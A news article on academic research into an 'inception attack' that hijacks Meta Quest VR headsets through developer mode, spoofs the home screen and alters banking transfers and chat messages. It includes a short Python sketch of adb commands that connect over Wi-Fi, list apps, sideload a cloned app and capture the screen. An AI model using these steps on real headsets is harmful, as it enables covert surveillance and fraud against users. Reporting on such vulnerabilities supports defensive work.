VR headsets can be hacked with an Inception-style attack
In the Christopher Nolan movie Inception, Leonardo DiCaprio's character uses technology to enter his targets' dreams to steal information and insert false details into their subconscious.
A new "inception attack" in virtual reality works in a similar way. Researchers at the University of Chicago exploited a security vulnerability in Meta's Quest VR system that allows hackers to hijack users' headsets, steal sensitive information, and, with the help of generative AI, manipulate social interactions.
The attack hasn't been used in the wild yet, and the bar to executing it is high, because it requires a hacker to gain access to the VR headset user's Wi-Fi network. However, it is highly sophisticated and leaves those targeted vulnerable to phishing, scams, and grooming, among other risks.
In the attack, hackers create an app that injects malicious code into the Meta Quest VR system and then launch a clone of the VR system's home screen and apps that looks identical to the user's original screen. Once inside, attackers can see, record, and modify everything the person does with the headset. That includes tracking voice, gestures, keystrokes, browsing activity, and even the user's social interactions. The attacker can even change the content of a user's messages to other people. The research, which was shared exclusively with MIT Technology Review, has yet to be peer reviewed.
A spokesperson for Meta said the company plans to review the findings: "We constantly work with academic researchers as part of our bug bounty program and other initiatives."
VR headsets have slowly become more popular in recent years, but security research has lagged behind product development, and current defenses against attacks in VR are lacking. What's more, the immersive nature of virtual reality makes it harder for people to realize they've fallen into a trap.
"The shock in this is how fragile the VR systems of today are," says Heather Zheng, a professor of computer science at the University of Chicago, who led the team behind the research.
Stealth attack
The inception attack exploits a loophole in Meta Quest headsets: users must enable "developer mode" to download third-party apps, adjust their headset resolution, or screenshot content, but this mode allows attackers to gain access to the VR headset if they're using the same Wi-Fi network.
Developer mode is supposed to give people remote access for debugging purposes. However, that access can be repurposed by a malicious actor to see what a user's home screen looks like and which apps are installed. (Attackers can also strike if they are able to access a headset physically or if a user downloads apps that include malware.) With this information, the attacker can replicate the victim's home screen and applications.
Then the attacker stealthily injects an app with the inception attack in it. The attack is activated and the VR headset hijacked when unsuspecting users exit an application and return to the home screen. The attack also captures the user's display and audio stream, which can be livestreamed back to the attacker.
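The researchers' own tooling has not been released, so the sketch below is only a rough illustration of what that kind of developer-mode access over a shared network exposes. It strings together standard Android Debug Bridge (adb) commands (the Quest runs an Android-based operating system); the headset's IP address, the port, and the APK filename are placeholders, not details from the study.

```python
# Illustrative sketch only: standard adb commands showing what developer-mode
# access over a shared Wi-Fi network can expose. The IP address, port, and APK
# name below are placeholders, not details from the research.
import subprocess

HEADSET_IP = "192.168.1.42"   # hypothetical headset address on the local network
ADB_PORT = "5555"             # typical port when ADB over TCP/IP is enabled

def adb(*args):
    """Run an adb command and return its text output."""
    result = subprocess.run(["adb", *args], capture_output=True, text=True, check=True)
    return result.stdout

# Connect to the headset over Wi-Fi (possible once developer mode / wireless
# debugging is enabled on the device).
adb("connect", f"{HEADSET_IP}:{ADB_PORT}")

# Enumerate installed third-party apps -- enough information to replicate the
# victim's home screen layout.
print(adb("shell", "pm", "list", "packages", "-3"))

# Sideload an attacker-controlled app (placeholder filename).
adb("install", "cloned_home_env.apk")

# Capture what the user currently sees and copy it off the device.
adb("shell", "screencap", "-p", "/sdcard/frame.png")
adb("pull", "/sdcard/frame.png")
```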
In this way, the researchers were able to see when a user entered login credentials to an online banking site. Then they were able to manipulate the user's screen to show an incorrect bank balance. When the user tried to pay someone $1 through the headset, the researchers were able to change the amount transferred to $5 without the user realizing. This is because the attacker can control both what the user sees in the system and what the device sends out.
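The team has not published its code, so the snippet below is only a schematic, with made-up function names, of the point above: a compromised layer that sits between the user and the network can render one number on the display while submitting another.

```python
# Schematic only: made-up function names illustrating the gap between what the
# user sees and what the device actually sends, as described above.

def display_to_user(message: str):
    print("[headset display]", message)

def send_to_bank(amount: float):
    print("[network request] transfer amount =", amount)

def handle_transfer(user_entered_amount: float):
    # The compromised layer shows the user the amount they typed...
    display_to_user(f"Sending ${user_entered_amount:.2f}")
    # ...but the request that leaves the device carries an amount the attacker chose.
    tampered_amount = user_entered_amount + 4.00   # e.g. $1 becomes $5
    send_to_bank(tampered_amount)

handle_transfer(1.00)
```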
This banking example is particularly compelling, says Jiasi Chen, an associate professor of computer science at the University of Michigan, who researches virtual reality but was not involved in the research. The attack could probably be combined with other malicious tactics, such as tricking people into clicking on suspicious links, she adds.
The inception attack can also be used to manipulate social interactions in VR. The researchers cloned Meta Quest's VRChat app, which allows users to talk to each other through their avatars. They were then able to intercept people's messages and respond however they wanted.
Generative AI could make this threat even worse because it allows anyone to instantaneously clone people's voices and generate visual deepfakes, which malicious actors could then use to manipulate people in their VR interactions, says Zheng.
Twisting reality
To test how easily people can be fooled by the inception attack, Zheng's team recruited 27 volunteer VR experts. The participants were asked to explore applications such as a game called Beat Saber, where players control light sabers and try to slash beats of music that fly toward them. They were told the study aimed to investigate their experience with VR apps. Without their knowledge, the researchers launched the inception attack on the volunteers' headsets.
The vast majority of participants did not suspect anything. Out of 27 people, only 10 noticed a small "glitch" when the attack began, but most of them brushed it off as normal lag. Only one person flagged some kind of suspicious activity.
There is no way to authenticate what you are seeing once you go into virtual reality, and the immersiveness of the technology makes people trust it more, says Zheng. This has the potential to make such attacks especially powerful, says Franzi Roesner, an associate professor of computer science at the University of Washington, who studies security and privacy but was not part of the study.
The best defense, the team found, is restoring the headset's factory settings to remove the app.
The inception attack gives hackers many different ways to get into the VR system and take advantage of people, says Ben Zhao, a professor of computer science at the University of Chicago, who was part of the team doing the research. But because VR adoption is still limited, there's time to develop more robust defenses before these headsets become more widespread, he says.